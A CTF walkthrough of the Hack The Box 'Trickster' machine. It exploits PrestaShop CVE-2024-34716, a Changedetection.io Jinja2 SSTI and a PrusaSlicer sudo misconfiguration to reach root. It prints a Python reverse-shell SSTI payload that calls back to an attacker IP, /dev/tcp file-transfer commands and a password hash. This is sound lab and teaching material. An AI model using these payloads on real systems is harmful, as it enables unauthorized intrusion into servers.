Hack The Box: Trickster Machine Walkthrough – Medium Difficulty

Introduction to Trickster:

In this write-up, we will explore the “Trickster” machine from Hack The Box, categorized as a medium-difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

The objective of Trickster:

The goal of this walkthrough is to complete the “Trickster” machine from Hack The Box by achieving the following objectives:

User Flag:

Exploiting PrestaShop for Initial Access and Credential Discovery

We exploit a vulnerable PrestaShop CMS (CVE-2024-34716) hosting an online shop to gain an initial shell as www-data. Credentials discovered in PHP configuration files facilitate lateral movement to a low-privileged user, enabling further exploration of the environment.

Root Flag:

Pivoting via Changedetection.io SSTI and Root Escalation with PrusaSlicer

After gaining access to this host, we uncover credentials that allow us to move laterally to another user. This user, additionally, has the necessary permissions to execute a vulnerable PrusaSlicer 2.6.1 binary as root, which ultimately enables us to escalate further.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oN nmap_initial.txt 10.10.11.34

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/trickster]
└──╼ $nmap -sC -sV 10.10.11.34 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-29 22:11 EST
Nmap scan report for 10.10.11.34
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.18 seconds
┌─[dark@parrot]─[~/Documents/htb/trickster]
└──╼ $

Analysis:

• Port 22 (SSH): OpenSSH 8.9p1 on Ubuntu with ECDSA and ED25519 host keys for secure remote access.
• Port 80 (HTTP): Apache 2.4.52 on Ubuntu with a redirect to http://trickster.htb/.

Web Enumeration

Web Application Exploration:

Perform web enumeration to discover potentially exploitable directories and files.

While exploring the website, we discover a subdomain, shop.trickster.htb, which appears to be built using the PrestaShop CMS.

The website interface seems similar to the one shown above.

┌─[dark@parrot]─[~/Documents/htb/trickster]
└──╼ $ffuf -c -w /opt/SecLists/Discovery/Web-Content/common.txt -t 20 -fc 404,403 -e .php,.html,.txt,.md -u http://shop.trickster.htb/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://shop.trickster.htb/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/common.txt
 :: Extensions       : .php .html .txt .md 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 20
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404,403
________________________________________________

.git/config             [Status: 200, Size: 112, Words: 11, Lines: 8, Duration: 24ms]
.git                    [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 41ms]
.git/HEAD               [Status: 200, Size: 28, Words: 2, Lines: 2, Duration: 39ms]
.git/index              [Status: 200, Size: 252177, Words: 733, Lines: 978, Duration: 17ms]
.git/logs/              [Status: 200, Size: 1137, Words: 77, Lines: 18, Duration: 14ms]
:: Progress: [23695/23695] :: Job [1/1] :: 427 req/sec :: Duration: [0:01:07] :: Errors: 0 ::

Fuzzing for hidden content reveals the presence of a .git folder.

By utilizing the git-dumper, we can download the contents of the exposed .git directory.

Navigate to the admin634ewutrx1jgitlooaj folder to uncover the installed PrestaShop version (8.1.5).

What is the PrestaShop application?

PrestaShop is a free, open-source e-commerce platform designed to help individuals and businesses create and manage online stores. It is built using PHP and MySQL and offers a highly customizable and user-friendly environment for selling products or services online. PrestaShop supports multiple languages and currencies, making it ideal for global businesses. Users can extend its functionality with plugins, modules, and themes available in its marketplace.

CVE-2024-34716 Vulnerability on Trickster machine

Check for vulnerabilities at CVE-2024-34716 on CVE Details, and find the PoC on GitHub.

When running the PoC, you’ll notice it depends on the ncat binary, so you might need to make a slight modification to use nc or any other similar tool.

Since www-data permissions are typically limited, a common approach is to search for credentials within PHP configuration files, although this method may not always be reliable or stable.

It requires a bit more patience, as finding credentials in PHP configuration files can sometimes take time, but it’s often worth the effort.

Script Overview on Trickster Machine

It exploits a vulnerability in PrestaShop (CVE-2024-34716) by first gathering key information, such as the target PrestaShop URL, admin email, local IP, and admin path. It then modifies HTML and PHP files to craft a malicious payload, packaging it into a ZIP file containing a reverse shell script. The script sends a GET request to fetch the security token, followed by a POST request to submit the payload.

Once the reverse shell is detected, the script sets up a local HTTP server to listen on port 12345 for incoming connections, allowing the attacker to remotely control the compromised server. To prevent such vulnerabilities, it’s crucial to keep software updated, use strong passwords, back up data regularly, and deploy security software.

Enumeration on www-data access

The credentials that show above contain the username and password that we can access via MySQL database

MySQL database enumeration on Trickster machine

Use the ps_employee credentials to log into the MySQL PrestaShop database, but first, you need to obtain a full interactive shell. Once you have access, you can connect to the database and dump the password hashes.

The ps_employee table in the PrestaShop database contains information about the employees with access to the platform. For example, the first row shows an employee with an email admin@trickster.htb, whose password is stored as a hashed value ($2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C). This employee has the profile ID 1 and is active, with the last connection date recorded as 2024-10-16. The second row shows another employee with the email james@trickster.htb and a different hashed password.

Perform a hash cracking attack on “James” (using module 3200)

We have successfully gained access through the SSH session.

We can retrieve the user flag by executing the command cat user.txt.

Escalate to Root Privileges Access

Privilege Escalation:

Start a shell session as the user james and use the sudo -l command to enumerate the user’s privileges and the system configuration.

Explore the directories to identify valuable files or misconfigurations that could be exploited to gain further access or escalate privileges.

Docker escape with Port-Forwarding

It appears that we are operating within a Docker environment.

While scanning for open ports, we discovered the IP address 172.17.0.2. A port scan reveals that port 5000 is open. To access this port, we need to set up local port forwarding, using the compromised host as a pivot.

To proceed, execute the following command to establish local port forwarding.

ssh -L 5000:172.17.0.2:5000 james@trickster.htb

CVE-2024-32651 enumeration

Description
Summary
A Server-Side Template Injection (SSTI) vulnerability in Changedetection.io, caused by the use of unsafe Jinja2 functions, enables Remote Command Execution (RCE) on the server host.

Details
Affected version: Changedetection.io version 0.45.20

The vulnerability results from the usage of unsafe functions in the Jinja2 template engine:

from jinja2 import Environment, BaseLoader
...
    # Get the notification body from datastore  
    jinja2_env = Environment(loader=BaseLoader)  
    n_body = jinja2_env.from_string(n_object.get('notification_body', '')).render(**notification_parameters)  
    n_title = jinja2_env.from_string(n_object.get('notification_title', '')).render(**notification_parameters)  

Proof of Concept (PoC)

1. Create or edit a URL watch item.
2. The payload below can be uploaded in the Notification tab

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

This payload triggers command execution, revealing the output of the id command.

Once the port is forwarded, you can access the site locally through Firefox and log in using the james password.

Vulnerability POC

A Changedetection.io webpage is accessible, allowing it to track changes on websites and notify users of updates, such as news articles or product changes. Certain versions are vulnerable to SSTI, as outlined in CVE-2024-32651. A proof-of-concept (PoC) for exploiting this vulnerability is available here.

Upon accessing the port on my machine, a login page is displayed.

Begin by starting the HTTP server service on Parrot OS and configuring it within ChangeDetection.io.

In the “Notifications” tab, input the URL for the reports in the format gets://10.10.xxx.xxx, then insert the following Jinja2-based SSTI reverse shell payload:

{{ self.init.globals.builtins.import('os').system('python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.xxx.xxx\",1919));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")"') }}

Upon clicking “Save,” we notice an initial request is received on our local HTTP server. The application requests the index.html file and begins monitoring for changes.

The application will check for changes to the index.html page and notify you every 30 seconds. To trigger the reverse shell, modify the index.html file served on the local HTTP server and wait for the application to detect the change and execute the payload. Alternatively, you can click “Recheck” to immediately trigger the detection.

Once the application identifies the change, a request is sent to the HTTP server, and a reverse shell connection is established on port 9007.

After some time, we successfully obtained the Docker shell.

Exploring Another Approach to Utilizing the Python Script

This script is designed to exploit a vulnerability in the ChangeDetection.io platform, which is a tool used to monitor website changes. The vulnerability, known as Server-Side Template Injection (SSTI), allows attackers to inject malicious code into the system. The script works by automating the process of adding a new website to monitor, where it sends specially crafted requests to the server, tricking it into executing malicious commands.

The script begins by interacting with the target website and obtaining a security token needed to perform actions like logging in or submitting forms. Once the system detects a change in the monitored website, it executes the malicious code, connecting back to the attacker’s machine on the specified port. This allows the attacker to gain unauthorized access to the server, potentially compromising sensitive information or performing malicious activities.

Indeed, we successfully retrieved a shell similar to the previous one using the Python script.

Unpacking the Mystery of the .br Extension on Trickster Machine

The web application is running within a container, meaning we have root access to the container (172.17.0.2), not to the Trickster machine (172.17.0.1).

In our search for ways to break out of the container or move laterally, we discover database backups located at /datastore/Backups/.

cat changedetection-backup-20240830202524.zip > /dev/tcp/172.17.0.1/9007
cat changedetection-backup-20240830194841.zip > /dev/tcp/172.17.0.1/9007

To transfer these files from the container (172.17.0.2) to the James SSH shell (172.17.0.1), we first initiate a listener on port 9007 on the James shell. Once the listener is active, we proceed to send the files from the container.

Inside the ZIP files, we find two .txt.br files, which are compressed using Brotli compression (https://fileinfo.com/extension/br). Brotli is a widely adopted compression algorithm, specifically designed for HTTP compression. These .txt.br files will need to be decompressed before we can inspect their contents.

The .br file is a compressed file format that uses the Brotli compression algorithm, developed by Google. It’s often used for compressing web data like HTML, CSS, and JavaScript to reduce bandwidth and improve load times. In the context of CTF, encountering a .br file means that you have a compressed file that needs to be decompressed before you can access its contents.

To extract and view the contents of a .br file, you’ll need to use tools that support Brotli decompression. Common options include using the brotli command or libraries in languages like Python. Once decompressed, the contents might reveal crucial information, like flags or other artefacts, that can help you advance in the challenge.

Shell as Adam Access

The root password was easily found in the history tab, which was considered too simple for a challenge of this level, especially when the adam user wasn’t even used. Now, let’s walk through the intended method for obtaining root access.

Shell as adam: There’s virtually nothing to explore except for the datastore folder.

SSH into the adam account using the password. Running sudo -l reveals that we can execute prusaslicer as root without needing a password.

Prusaslicer exploitation on Trickster machine

Upon researching the prusaslicer binary, we discovered a recent RCE exploit detailed here: Exploit-DB #51983.

We need to create a simpler prusaslicer payload to attempt to gain root access from the adam user. To do this, use the command:

git clone https://github.com/suce0155/prusaslicer_exploit

We need to adjust the entire payload.

In this scenario, the user, operating under the account “adam,” is working with a file named “exploit.sh” that contains a command to create a reverse shell. A reverse shell allows an attacker to remotely access and control the system.

The user moves the exploit script to a specific directory, makes it executable, and runs it through a tool called PrusaSlicer. PrusaSlicer is generally used for preparing 3D print jobs; however, in this instance, it is repurposed to execute the exploit. As a result, when the tool processes a 3D print file (“evil.3mf”), it triggers the exploit, thereby establishing a connection back to the attacker’s machine at a designated IP address and port. This enables the attacker to control the system remotely. The message “EXPLOIT” confirms that the exploit was executed successfully.

We have successfully gained root access to the system.

We can retrieve the root flag by executing the command cat root.txt.